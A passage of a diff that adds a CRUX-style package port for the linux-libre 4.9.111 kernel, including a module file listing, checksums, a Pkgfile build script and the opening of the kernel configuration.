+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/video/backlight/generic_bl.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/video/backlight/lcd.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/virtio/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/virtio/virtio_balloon.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/virtio/virtio_input.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/virtio/virtio_mmio.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/masters/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/masters/ds1wm.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/masters/ds2482.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/masters/ds2490.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/masters/matrox_w1.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/masters/w1-gpio.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_bq27000.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_ds2406.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_ds2408.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_ds2413.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_ds2423.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_ds2431.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_ds2433.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_ds2760.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_ds2780.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_ds2781.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_ds28e04.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_smem.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/slaves/w1_therm.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/w1/wire.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/acquirewdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/advantechwdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/alim1535_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/alim7101_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/cadence_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/cpu5wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/dw_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/eurotechwdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/f71808e_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/hpwdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/i6300esb.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/iTCO_vendor_support.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/iTCO_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/ib700wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/ibmasr.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/ie6xx_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/it8712f_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/it87_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/machzwd.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/max63xx_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/mena21_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/ni903x_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/nv_tco.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/of_xilinx_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/pc87413_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/pcwd_pci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/pcwd_usb.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/sbc60xxwdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/sbc_epx_c3.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/sbc_fitpc2_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/sc1200wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/sch311x_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/smsc37b787_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/softdog.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/sp5100_tco.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/via_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/w83627hf_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/w83877f_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/w83977f_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/wafer5823wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/wdat_wdt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/wdt_pci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/watchdog/ziirave_wdt.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/btrfs/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/btrfs/btrfs.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/f2fs/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/f2fs/f2fs.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/fat/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/fat/fat.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/fat/msdos.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/fat/vfat.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/fuse/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/fuse/fuse.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/hfsplus/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/hfsplus/hfsplus.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/isofs/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/isofs/isofs.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/jfs/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/jfs/jfs.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/nilfs2/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/nilfs2/nilfs2.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/nls/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/nls/nls_cp437.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/nls/nls_iso8859-1.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/nls/nls_iso8859-15.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/nls/nls_utf8.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/ntfs/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/ntfs/ntfs.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/reiserfs/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/reiserfs/reiserfs.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/udf/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/udf/udf.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/ufs/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/ufs/ufs.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/fs/xfs/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/fs/xfs/xfs.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/net/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/net/bluetooth/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/bluetooth/bluetooth.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/net/core/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/core/pktgen.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/ah4.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/esp4.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/gre.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/inet_diag.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/ip_gre.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/ip_vti.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/ipcomp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/ipip.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/netfilter/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/netfilter/nf_nat_snmp_basic.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/tcp_diag.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/tunnel4.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/udp_diag.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/xfrm4_mode_beet.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/xfrm4_mode_transport.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/xfrm4_mode_tunnel.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/ipv4/xfrm4_tunnel.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/net/mac80211/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/mac80211/mac80211.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/net/netfilter/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/netfilter/xt_LED.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/net/rfkill/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/rfkill/rfkill.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/net/wireless/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/wireless/cfg80211.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/wireless/lib80211.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/wireless/lib80211_crypt_ccmp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/wireless/lib80211_crypt_tkip.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/wireless/lib80211_crypt_wep.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/net/xfrm/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/net/xfrm/xfrm_ipcomp.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/sound/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/sound/core/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/core/snd-pcm.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/core/snd-timer.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/core/snd.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/sound/hda/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/hda/snd-hda-core.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/sound/pci/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec-analog.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec-ca0110.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec-ca0132.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec-cirrus.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec-cmedia.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec-conexant.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec-generic.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec-hdmi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec-idt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec-realtek.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec-si3054.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec-via.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-codec.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/pci/hda/snd-hda-intel.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/sound/soundcore.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/modules.alias
+-rw-r--r--	root/root	lib/modules/<kernel-version>/modules.alias.bin
+-rw-r--r--	root/root	lib/modules/<kernel-version>/modules.builtin
+-rw-r--r--	root/root	lib/modules/<kernel-version>/modules.builtin.bin
+-rw-r--r--	root/root	lib/modules/<kernel-version>/modules.dep
+-rw-r--r--	root/root	lib/modules/<kernel-version>/modules.dep.bin
+-rw-r--r--	root/root	lib/modules/<kernel-version>/modules.devname
+-rw-r--r--	root/root	lib/modules/<kernel-version>/modules.order
+-rw-r--r--	root/root	lib/modules/<kernel-version>/modules.softdep
+-rw-r--r--	root/root	lib/modules/<kernel-version>/modules.symbols
+-rw-r--r--	root/root	lib/modules/<kernel-version>/modules.symbols.bin
+lrwxrwxrwx	root/root	lib/modules/<kernel-version>/source -> /usr/src/linux-4.9.111
+drwxr-xr-x	root/root	usr/
+drwxr-xr-x	root/root	usr/src/
+-rw-r--r--	root/root	usr/src/config-4.9.111-gnu
+-rw-r--r--	root/root	usr/src/cpu_optimizations-4.9.111.patch
diff --git a/linux/ports/linux-gnu/.md5sum b/linux/ports/linux-gnu/.md5sum
new file mode 100644
index 0000000..d79a0d9
--- /dev/null
+++ b/linux/ports/linux-gnu/.md5sum
@@ -0,0 +1,3 @@
+9fa0186479cf95f6ecf40d613169c7d8  config-crux
+c92c4304d774ced05be10a35a0a2ec55  cpu_optimizations.patch
+cb34a8cc00f62ee5c97619ab0689f8ad  linux-libre-4.9.111-gnu.tar.xz
diff --git a/linux/ports/linux-gnu/Pkgfile b/linux/ports/linux-gnu/Pkgfile
new file mode 100644
index 0000000..ea8868f
--- /dev/null
+++ b/linux/ports/linux-gnu/Pkgfile
@@ -0,0 +1,42 @@
+# Description:  Gnu linux kernel that comes without blobs
+# URL:          http://linux-libre.fsfla.org
+# Maintainer:   Silvino, silvino at bk dot ru
+# Depends on:   dracut grub2 grub2-efi
+
+name=linux-gnu
+version=4.9.111
+release=12
+source=(https://linux-libre.fsfla.org/pub/linux-libre/releases/$version-gnu/linux-libre-$version-gnu.tar.xz \
+    cpu_optimizations.patch \
+    config-crux)
+
+build() {
+
+    cd linux-$version
+
+    patch -p1 < $SRC/cpu_optimizations.patch
+
+    make distclean
+
+    cp $SRC/config-crux .config
+
+    make olddefconfig
+    # make nconfig
+    # make localmodconfig
+
+    # make LOCALVERSION= all
+    make LOCALVERSION= bzImage modules
+    make INSTALL_MOD_PATH=$PKG modules_install
+
+    install -m 0644 -D arch/x86_64/boot/bzImage $PKG/boot/vmlinuz-$version-gnu
+    install -m 0644  System.map $PKG/boot/System.map-$version-gnu
+    install -m 0644 .config $PKG/boot/config-$version-gnu
+    install -m 0644 -D .config $PKG/usr/src/config-${version}-gnu
+    install -m 0644 $SRC/cpu_optimizations.patch $PKG/usr/src/cpu_optimizations-${version}.patch
+
+    rm ${PKG}/lib/modules/${version}-gnu/source
+    rm ${PKG}/lib/modules/${version}-gnu/build
+
+    ln -s /usr/src/linux-${version} $PKG/lib/modules/${version}-gnu/source
+    ln -s /usr/src/linux-${version} $PKG/lib/modules/${version}-gnu/build
+}
diff --git a/linux/ports/linux-gnu/config-crux b/linux/ports/linux-gnu/config-crux
new file mode 100644
index 0000000..35df266
--- /dev/null
+++ b/linux/ports/linux-gnu/config-crux
@@ -0,0 +1,4892 @@
+#
+# Automatically generated file; DO NOT EDIT.
+# Linux/x86 4.9.111-gnu Kernel Configuration
+#
+CONFIG_64BIT=y
+CONFIG_X86_64=y
+CONFIG_X86=y
+CONFIG_INSTRUCTION_DECODER=y
+CONFIG_OUTPUT_FORMAT="elf64-x86-64"
+CONFIG_ARCH_DEFCONFIG="arch/x86/configs/x86_64_defconfig"
+CONFIG_LOCKDEP_SUPPORT=y
+CONFIG_STACKTRACE_SUPPORT=y
+CONFIG_MMU=y
+CONFIG_ARCH_MMAP_RND_BITS_MIN=28
+CONFIG_ARCH_MMAP_RND_BITS_MAX=32
+CONFIG_ARCH_MMAP_RND_COMPAT_BITS_MIN=8
+CONFIG_ARCH_MMAP_RND_COMPAT_BITS_MAX=16
+CONFIG_NEED_DMA_MAP_STATE=y
+CONFIG_NEED_SG_DMA_LENGTH=y
+CONFIG_GENERIC_ISA_DMA=y
+CONFIG_GENERIC_BUG=y
+CONFIG_GENERIC_BUG_RELATIVE_POINTERS=y
+CONFIG_GENERIC_HWEIGHT=y
+CONFIG_ARCH_MAY_HAVE_PC_FDC=y
+CONFIG_RWSEM_XCHGADD_ALGORITHM=y
+CONFIG_GENERIC_CALIBRATE_DELAY=y
+CONFIG_ARCH_HAS_CPU_RELAX=y
+CONFIG_ARCH_HAS_CACHE_LINE_SIZE=y
+CONFIG_HAVE_SETUP_PER_CPU_AREA=y
+CONFIG_NEED_PER_CPU_EMBED_FIRST_CHUNK=y
+CONFIG_NEED_PER_CPU_PAGE_FIRST_CHUNK=y
+CONFIG_ARCH_HIBERNATION_POSSIBLE=y
+CONFIG_ARCH_SUSPEND_POSSIBLE=y
+CONFIG_ARCH_WANT_HUGE_PMD_SHARE=y
+CONFIG_ARCH_WANT_GENERAL_HUGETLB=y
+CONFIG_ZONE_DMA32=y
+CONFIG_AUDIT_ARCH=y
+CONFIG_ARCH_SUPPORTS_OPTIMIZED_INLINING=y
+CONFIG_ARCH_SUPPORTS_DEBUG_PAGEALLOC=y
+CONFIG_HAVE_INTEL_TXT=y
+CONFIG_X86_64_SMP=y
+CONFIG_ARCH_SUPPORTS_UPROBES=y
+CONFIG_FIX_EARLYCON_MEM=y
+CONFIG_DEBUG_RODATA=y
+CONFIG_PGTABLE_LEVELS=4
+CONFIG_DEFCONFIG_LIST="/lib/modules/$UNAME_RELEASE/.config"
+CONFIG_IRQ_WORK=y
+CONFIG_BUILDTIME_EXTABLE_SORT=y
+CONFIG_THREAD_INFO_IN_TASK=y
+
+#
+# General setup
+#
+CONFIG_INIT_ENV_ARG_LIMIT=32
+CONFIG_CROSS_COMPILE=""
+# CONFIG_COMPILE_TEST is not set
+CONFIG_LOCALVERSION=""
+# CONFIG_LOCALVERSION_AUTO is not set
+CONFIG_HAVE_KERNEL_GZIP=y
+CONFIG_HAVE_KERNEL_BZIP2=y
+CONFIG_HAVE_KERNEL_LZMA=y
+CONFIG_HAVE_KERNEL_XZ=y
+CONFIG_HAVE_KERNEL_LZO=y
+CONFIG_HAVE_KERNEL_LZ4=y
+# CONFIG_KERNEL_GZIP is not set
+# CONFIG_KERNEL_BZIP2 is not set
+# CONFIG_KERNEL_LZMA is not set
+CONFIG_KERNEL_XZ=y
+# CONFIG_KERNEL_LZO is not set
+# CONFIG_KERNEL_LZ4 is not set
+CONFIG_DEFAULT_HOSTNAME="(none)"
+CONFIG_SWAP=y
+CONFIG_SYSVIPC=y
+CONFIG_SYSVIPC_SYSCTL=y
+CONFIG_POSIX_MQUEUE=y
+CONFIG_POSIX_MQUEUE_SYSCTL=y
+# CONFIG_CROSS_MEMORY_ATTACH is not set
+CONFIG_FHANDLE=y
+# CONFIG_USELIB is not set
+CONFIG_AUDIT=y
+CONFIG_HAVE_ARCH_AUDITSYSCALL=y
+CONFIG_AUDITSYSCALL=y
+CONFIG_AUDIT_WATCH=y
+CONFIG_AUDIT_TREE=y
+
+#
+# IRQ subsystem
+#
+CONFIG_GENERIC_IRQ_PROBE=y
+CONFIG_GENERIC_IRQ_SHOW=y
+CONFIG_GENERIC_PENDING_IRQ=y
+CONFIG_GENERIC_IRQ_CHIP=y
+CONFIG_IRQ_DOMAIN=y
+CONFIG_IRQ_DOMAIN_HIERARCHY=y
+CONFIG_GENERIC_MSI_IRQ=y
+CONFIG_GENERIC_MSI_IRQ_DOMAIN=y
+# CONFIG_IRQ_DOMAIN_DEBUG is not set
+CONFIG_IRQ_FORCED_THREADING=y
+CONFIG_SPARSE_IRQ=y
+CONFIG_CLOCKSOURCE_WATCHDOG=y
+CONFIG_ARCH_CLOCKSOURCE_DATA=y
+CONFIG_CLOCKSOURCE_VALIDATE_LAST_CYCLE=y
+CONFIG_GENERIC_TIME_VSYSCALL=y
+CONFIG_GENERIC_CLOCKEVENTS=y
+CONFIG_GENERIC_CLOCKEVENTS_BROADCAST=y
+CONFIG_GENERIC_CLOCKEVENTS_MIN_ADJUST=y
+CONFIG_GENERIC_CMOS_UPDATE=y
+
+#
+# Timers subsystem
+#
+CONFIG_TICK_ONESHOT=y
+CONFIG_NO_HZ_COMMON=y
+# CONFIG_HZ_PERIODIC is not set
+CONFIG_NO_HZ_IDLE=y
+# CONFIG_NO_HZ_FULL is not set
+# CONFIG_NO_HZ is not set
+CONFIG_HIGH_RES_TIMERS=y
+
+#
+# CPU/Task time and stats accounting
+#
+CONFIG_TICK_CPU_ACCOUNTING=y
+# CONFIG_VIRT_CPU_ACCOUNTING_GEN is not set
+# CONFIG_IRQ_TIME_ACCOUNTING is not set
+CONFIG_BSD_PROCESS_ACCT=y
+CONFIG_BSD_PROCESS_ACCT_V3=y
+CONFIG_TASKSTATS=y
+CONFIG_TASK_DELAY_ACCT=y
+# CONFIG_TASK_XACCT is not set
+
+#
+# RCU Subsystem
+#
+CONFIG_TREE_RCU=y
+# CONFIG_RCU_EXPERT is not set
+CONFIG_SRCU=y
+# CONFIG_TASKS_RCU is not set
+CONFIG_RCU_STALL_COMMON=y
+# CONFIG_TREE_RCU_TRACE is not set
+# CONFIG_RCU_EXPEDITE_BOOT is not set
+CONFIG_BUILD_BIN2C=y
+CONFIG_IKCONFIG=y
+CONFIG_IKCONFIG_PROC=y
+CONFIG_LOG_BUF_SHIFT=18
+CONFIG_LOG_CPU_MAX_BUF_SHIFT=12
+CONFIG_NMI_LOG_BUF_SHIFT=13
+CONFIG_HAVE_UNSTABLE_SCHED_CLOCK=y
+CONFIG_ARCH_SUPPORTS_NUMA_BALANCING=y
+CONFIG_ARCH_WANT_BATCHED_UNMAP_TLB_FLUSH=y
+CONFIG_ARCH_SUPPORTS_INT128=y
+CONFIG_CGROUPS=y
+CONFIG_PAGE_COUNTER=y
+CONFIG_MEMCG=y
+CONFIG_MEMCG_SWAP=y
+CONFIG_MEMCG_SWAP_ENABLED=y
+CONFIG_BLK_CGROUP=y
+# CONFIG_DEBUG_BLK_CGROUP is not set
+CONFIG_CGROUP_WRITEBACK=y
+CONFIG_CGROUP_SCHED=y
+CONFIG_FAIR_GROUP_SCHED=y
+CONFIG_CFS_BANDWIDTH=y
+CONFIG_RT_GROUP_SCHED=y
+CONFIG_CGROUP_PIDS=y
+CONFIG_CGROUP_FREEZER=y
+CONFIG_CPUSETS=y
+CONFIG_PROC_PID_CPUSET=y
+CONFIG_CGROUP_DEVICE=y
+CONFIG_CGROUP_CPUACCT=y
+CONFIG_CGROUP_PERF=y
+# CONFIG_CGROUP_DEBUG is not set
+# CONFIG_CHECKPOINT_RESTORE is not set
+CONFIG_NAMESPACES=y
+CONFIG_UTS_NS=y
+CONFIG_IPC_NS=y
+CONFIG_USER_NS=y
+CONFIG_PID_NS=y
+CONFIG_NET_NS=y
+# CONFIG_SCHED_AUTOGROUP is not set
+# CONFIG_SYSFS_DEPRECATED is not set
+CONFIG_RELAY=y
+CONFIG_BLK_DEV_INITRD=y
+CONFIG_INITRAMFS_SOURCE=""
+CONFIG_RD_GZIP=y
+CONFIG_RD_BZIP2=y
+CONFIG_RD_LZMA=y
+CONFIG_RD_XZ=y
+CONFIG_RD_LZO=y
+CONFIG_RD_LZ4=y
+CONFIG_CC_OPTIMIZE_FOR_PERFORMANCE=y
+# CONFIG_CC_OPTIMIZE_FOR_SIZE is not set
+CONFIG_SYSCTL=y
+CONFIG_ANON_INODES=y
+CONFIG_SYSCTL_EXCEPTION_TRACE=y
+CONFIG_HAVE_PCSPKR_PLATFORM=y
+CONFIG_BPF=y
+CONFIG_EXPERT=y
+CONFIG_MULTIUSER=y
+CONFIG_SGETMASK_SYSCALL=y
+CONFIG_SYSFS_SYSCALL=y
+# CONFIG_SYSCTL_SYSCALL is not set
+CONFIG_KALLSYMS=y
+# CONFIG_KALLSYMS_ALL is not set
+CONFIG_KALLSYMS_ABSOLUTE_PERCPU=y
+CONFIG_KALLSYMS_BASE_RELATIVE=y
+CONFIG_PRINTK=y
+CONFIG_PRINTK_NMI=y
+CONFIG_BUG=y
+CONFIG_ELF_CORE=y
+CONFIG_PCSPKR_PLATFORM=y
+CONFIG_BASE_FULL=y
+CONFIG_FUTEX=y
+CONFIG_EPOLL=y
+CONFIG_SIGNALFD=y
+CONFIG_TIMERFD=y
+CONFIG_EVENTFD=y
+# CONFIG_BPF_SYSCALL is not set
+CONFIG_SHMEM=y
+CONFIG_AIO=y
+CONFIG_ADVISE_SYSCALLS=y
+# CONFIG_USERFAULTFD is not set
+CONFIG_PCI_QUIRKS=y
+CONFIG_MEMBARRIER=y
+# CONFIG_EMBEDDED is not set
+CONFIG_HAVE_PERF_EVENTS=y
+
+#
+# Kernel Performance Events And Counters
+#
+CONFIG_PERF_EVENTS=y
+# CONFIG_DEBUG_PERF_USE_VMALLOC is not set
+CONFIG_VM_EVENT_COUNTERS=y
+CONFIG_SLUB_DEBUG=y
+# CONFIG_COMPAT_BRK is not set
+# CONFIG_SLAB is not set
+CONFIG_SLUB=y
+# CONFIG_SLOB is not set
+CONFIG_SLAB_FREELIST_RANDOM=y
+CONFIG_SLUB_CPU_PARTIAL=y
+CONFIG_SYSTEM_DATA_VERIFICATION=y
+# CONFIG_PROFILING is not set
+CONFIG_HAVE_OPROFILE=y
